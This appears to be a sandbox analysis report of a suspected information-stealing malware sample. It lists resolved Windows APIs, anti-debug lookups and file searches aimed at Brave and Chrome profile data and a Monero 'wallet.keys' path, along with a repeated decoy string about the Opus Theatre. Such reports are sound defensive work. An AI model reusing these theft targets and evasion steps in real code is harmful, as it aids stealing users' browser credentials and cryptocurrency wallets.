GetProcAddress.KERNEL32(75900000,01396480), ref: 00199467
GetProcAddress.KERNEL32(75900000,013A08E8), ref: 00199480
GetProcAddress.KERNEL32(75900000,01396320), ref: 00199498
LoadLibraryA.KERNEL32(013A0900,?,001964A0), ref: 001994AA
LoadLibraryA.KERNEL32(013A0918,?,001964A0), ref: 001994BB
LoadLibraryA.KERNEL32(013A0858,?,001964A0), ref: 001994CD
LoadLibraryA.KERNEL32(013A0870,?,001964A0), ref: 001994DF
LoadLibraryA.KERNEL32(013A0888,?,001964A0), ref: 001994F0
GetProcAddress.KERNEL32(75070000,013A08A0), ref: 00199512
GetProcAddress.KERNEL32(75FD0000,013A08B8), ref: 00199533
GetProcAddress.KERNEL32(75FD0000,013A8CA0), ref: 0019954B
GetProcAddress.KERNEL32(75A50000,013A8D90), ref: 0019956D
GetProcAddress.KERNEL32(74E50000,013965C0), ref: 0019958E
GetProcAddress.KERNEL32(76E80000,013A8B40), ref: 001995AF
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001995C6

Strings

NtQueryInformationProcess, xrefs: 001995BA

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 75017fabf5b77f5dc886dcae82fcbd16088762953b3079437304e2af8125a4fe
Instruction ID: 9abc475504c8aa4fc8cc44622fc64422a481a8b795259ed4f4e4aa56e37ee65a
Opcode Fuzzy Hash: 75017fabf5b77f5dc886dcae82fcbd16088762953b3079437304e2af8125a4fe
Instruction Fuzzy Hash: A2A14DB9520200EFC746EFA8EC88E1A3BBEB74E741F41A51AE506C3674DB349845DF64

Function 00184610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0018465F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001847EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846D3

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: c91d07fa8b522dfdcf46fba82c7d8c57e7090764f570ba7f2e5cd50ef74b9fc1
Instruction ID: eb8c4afb91164b95e0411ddece24cef8b4ef6cd27a5ddc638b7c9b89f123c8b6
Opcode Fuzzy Hash: c91d07fa8b522dfdcf46fba82c7d8c57e7090764f570ba7f2e5cd50ef74b9fc1
Instruction Fuzzy Hash: 9441EF797EA788FBC72CFBA488CEE9D77675F47704F909244A81256280CFF099034666

Function 0018BCB0 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

FindFirstFileA.KERNEL32(00000000,?,001A0B17,001A0B16,00000000,?,?,?,001A1398,001A0B0F), ref: 0018BD35
StrCmpCA.SHLWAPI(?,001A139C), ref: 0018BD8D
StrCmpCA.SHLWAPI(?,001A13A0), ref: 0018BDA3
FindNextFileA.KERNELBASE(000000FF,?), ref: 0018C5FF
FindClose.KERNEL32(000000FF), ref: 0018C611

Strings

Google Chrome, xrefs: 0018C474
Preferences, xrefs: 0018BF5E
\Brave\Preferences, xrefs: 0018C01B
Brave, xrefs: 0018BF42

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 192a8b322d5e165a00e1fd934482001670f9b1a8564a063173a4bbdeb139e266
Instruction ID: 9d39b8a71643c28959ef1f1dc4987ff5ac94ebc02f75b754317e2b685cabebd9
Opcode Fuzzy Hash: 192a8b322d5e165a00e1fd934482001670f9b1a8564a063173a4bbdeb139e266
Instruction Fuzzy Hash: E1420172910104ABCF14FB60DD96EEE777DAFA5300F804568B90A56191EF34AB4DCBE2

Function 6C6735A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6FF688,00001000), ref: 6C6735D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6735E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6735FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C67363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C67369F
__aulldiv.LIBCMT ref: 6C6736E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C673773
EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C67377E
LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C6737BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6737C4
EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C6737CB
LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C673801
__aulldiv.LIBCMT ref: 6C673883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C673902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C673918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C67394C

Strings

GenuntelineI, xrefs: 6C673639
AuthcAMDenti, xrefs: 6C673946
MOZ_TIMESTAMP_MODE, xrefs: 6C6735DB
GTC, xrefs: 6C673912
QPC, xrefs: 6C6738FC

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 81aa848bdf0ff1b5a4f893ab737a37b5ebc876d352032505d3e1a3297de56531
Instruction ID: 19efee6e53d458ba148fe980800ed72d67073c053ae41af0c54b9a023f1586b1
Opcode Fuzzy Hash: 81aa848bdf0ff1b5a4f893ab737a37b5ebc876d352032505d3e1a3297de56531
Instruction Fuzzy Hash: 7FB1B471B093109BDB18DF2AD49461A7BF7AB8A700F04893DE5A9D3750EB309801CB9E

Function 001943F0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0019440C
FindFirstFileA.KERNEL32(?,?), ref: 00194423
StrCmpCA.SHLWAPI(?,001A0FAC), ref: 00194451
StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194467
FindNextFileA.KERNEL32(000000FF,?), ref: 0019465D
FindClose.KERNEL32(000000FF), ref: 00194672

Strings

%s\%s, xrefs: 001944DB
%s\%s, xrefs: 00194484
%s\*, xrefs: 00194400

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: d8121e18ab355c16b4a53be3eb9845a4ea3376df39493cea775aacd6493258bd
Instruction ID: e9e4892eaa8400fe3a90b5ac4d64536a30f00c092087b243a3a0dd94f4befd0e
Opcode Fuzzy Hash: d8121e18ab355c16b4a53be3eb9845a4ea3376df39493cea775aacd6493258bd
Instruction Fuzzy Hash: CA615772910218AFCF25EBA0DC45FEA777CBB5A701F008598F50A97141EB74AB49CFA1

Function 001939B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 001939D3
FindFirstFileA.KERNEL32(?,?), ref: 001939EA
StrCmpCA.SHLWAPI(?,001A0F7C), ref: 00193A18
StrCmpCA.SHLWAPI(?,001A0F80), ref: 00193A2E
FindNextFileA.KERNEL32(000000FF,?), ref: 00193B7C
FindClose.KERNEL32(000000FF), ref: 00193B91

Strings

%s\%s, xrefs: 001939C7

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: b994fc0ad92d24ddf808cb7b6bc14712400d7a974362d44a48ec2a041f852ccd
Instruction ID: d65e4dfe3b4bd5fb492620662031660e2e415846b12c91051758be45d488855c
Opcode Fuzzy Hash: b994fc0ad92d24ddf808cb7b6bc14712400d7a974362d44a48ec2a041f852ccd
